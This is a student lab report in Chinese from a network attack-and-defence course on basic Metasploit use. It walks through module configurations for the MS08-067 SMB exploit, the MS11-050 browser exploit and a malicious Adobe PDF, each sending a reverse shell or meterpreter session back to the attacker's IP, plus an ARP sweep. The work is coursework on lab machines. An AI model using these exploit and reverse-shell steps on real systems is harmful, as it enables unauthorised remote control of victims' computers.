2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用
2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用
驗前準備
本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
一個主動攻擊實踐,如ms08-067; (1分)
一個針對瀏覽器的攻擊,如ms11-050;(1分)
一個針對客戶端的攻擊,如Adobe;(1分)
成功應用任何一個輔助模塊。(0.5分)
預備知識
一、MSF的六種模塊
Exploit模塊 是利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊,以植入和運行攻擊載荷,從而獲得對遠程目標系統訪問權的代碼組件。 形象點來說就是攻擊模塊 Payload模塊 是在滲透成功後促使目標系統運行的一端植入代碼,通常作用是為滲透攻擊者打開在目標系統上的控制會話連接。實際上,該模塊就是計算機集成的針對不同操作系統實現shellcode攻擊的ruby代碼。 Encoder模塊 針對payload進行編碼,可以通過多種編碼手段、多次編碼方式有效的改變payload代碼特征 不改變payload作用,但能對payload進行加工 Aux模塊 能夠幫助滲透測試中在進行滲透攻擊之前得到的目標系統豐富的情報信息,從而發起更具目標性的精準攻擊。 主要包括針對各種網絡服務的掃描和查點、構建虛假服務收集登錄密碼、口令猜測破解、敏感信息嗅探、探查敏感信息泄露、Fuzz測試發掘漏洞、實施網絡協議欺騙等模塊。 Post模塊 支持在滲透攻擊取得目標系統遠程控制權之後,在受控系統中進行給各樣的後滲透攻擊動作。 這裏主要指的是攻擊之後可能用到的模塊 Nops模塊 是一些對程序運行狀態不會造成任何實質影響的空操作或無關操作指令,最典型的空指令就是空操作,在X86 CPU體系架構平臺上的操作碼是0x90 因為有些代碼返回地址很難確認,所以在實際中有時候會填充一大段空指令,便於快速確定返回地址的位置
二、MSF常用漏洞利用命令
search name:用指定關鍵字搜索可以利用的漏洞模塊 use exploit name:使用漏洞 show options:顯示配置選項 set option name option:設置選項 show payloads:回鏈攻擊載荷 show targets 顯示目標(os版本) set TARGET target number:設置目標版本 exploit:開始漏洞攻擊 sessions -l:列出會話 sessions -i id:選擇會話 sessions -k id:結束會話 Ctrl+z:把會話放到後臺 Ctrl+c:結束會話 show auxiliary:顯示輔助模塊 use auxiliary name :使用輔助模塊 set option name option:設置選項 exploit:運行模塊
實驗內容
Windows服務滲透攻擊——MS08-067安全漏洞
攻擊機:kali;靶機:windows 2003
在攻擊機kali輸入msfconsole進入控制臺,並進入
use exploit/windows/smb/ms08_067_netapi
界面,配置好端口號和回連ip:
set payload generic/shell_reverse_tcp //tcp反向回連 set LHOST 10.1.1.240 //攻擊機ip set LPORT 5225 //攻擊端口 set RHOST 192.168.6.131 //靶機ip,特定漏洞端口已經固定 set target 0 //自動選擇目標系統類型,匹配度較高 exploit //攻擊
建立會話,攻擊成功結果如下:
瀏覽器滲透攻擊——MS11-050
攻擊機:kali;靶機:WindowsXP Professional sp2/Windows7專業版
在kali的
mfconsole
下進入use windows/browser/ms11_050_mshtml_cobjectelement
,並配置好回連ip和端口號,開始監聽:
set payload windows/meterpreter/reverse_http //http反向回連
set LHOST 10.1.1.240 //攻擊機ip
set LPORT 5225 //攻擊端口固定
set URIPATH 5225wgy //統一資源標識符路徑設置
exploit
在xp的瀏覽器輸入
http://192.168.43.116:8080/5225wgy
,IE出現彈窗,警告遇到問題需關閉程序:將其列為可信網站之後,再次進入,則出現以下界面,攻擊失敗:
針對Adobe Reader軟件的滲透攻擊——adobe_toolbutton
攻擊機:kali;靶機:windowsXP Professional sp2 ③Adobe版本:9.3
在kali的
msfconsole
進入use windows/fileformat/adobe_cooltype_sing
,並配置好信息,生成攻擊pdf:
set payload windows/meterpreter/reverse_tcp //tcp反向回連
set LHOST 10.1.1.240 //攻擊機ip
set LPORT 5225 //攻擊端口
set FILENAME 5225wgy.pdf //設置生成pdf文件的名字
exploit //攻擊
但是由於kali隱藏了部分文件夾,我們需要手動設置顯示隱藏文件夾才能找到這個pdf文件(我一開始是使用mv指令移到桌面的..)
將生成的pdf文件拷貝到靶機上,在kali上輸入back退出當前模塊,進入監聽模塊,進入
use exploit/multi/handler
並配置好信息:
set payload windows/meterpreter/reverse_tcp //tcp反向連接
set LHOST 10.1.1.240 //攻擊機ip
set LPORT 5225 //攻擊端口固定
exploit
在靶機上打開5225.pdf文件:
攻擊機顯示攻擊成功:
此時若關閉pdf文件,則無法攻擊:
輔助模塊的應用:arp_sweep
攻擊機:kali;靶機:windows 2008
使用show auxiliary查看可以運用的輔助模塊:
使用
use auxiliary/scanner/discovery/arp_sweep
進入模塊,並使用show options查看需填參數:創建一個msf所需的數據庫
exploit掃描目標機:
可見目標機正在運行的ip信息
回答問題
用自己的話解釋什麽是exploit,payload,encode
exploit: 就是利用發現的漏洞和配置好的信息攻擊靶機的指令
payload:攻擊載荷,在它傳到靶機中後執行相應的代碼
encode:編碼器
實驗中遇到的問題及解決方法
問題:Windows服務滲透攻擊——MS08-067安全漏洞時,攻擊xp proferssional失敗
解決方案:攻擊機換成win2003即可(或者更低版本)
實踐總結與體會
這次實驗並不困難,但是模塊太多,第一次接觸有點眼花繚亂,我們發現msf的使用還是有套路可循的:進入模塊->指定荷載->設置參數->發動攻擊
離實戰還缺些什麽技術或步驟?
還差的很遠,嘗試過的模塊只是九牛一毛,如果要實戰還需要很多時間去研究其他模塊。
2018-2019-2 網絡對抗技術 20165225 Exp5 MSF基礎應用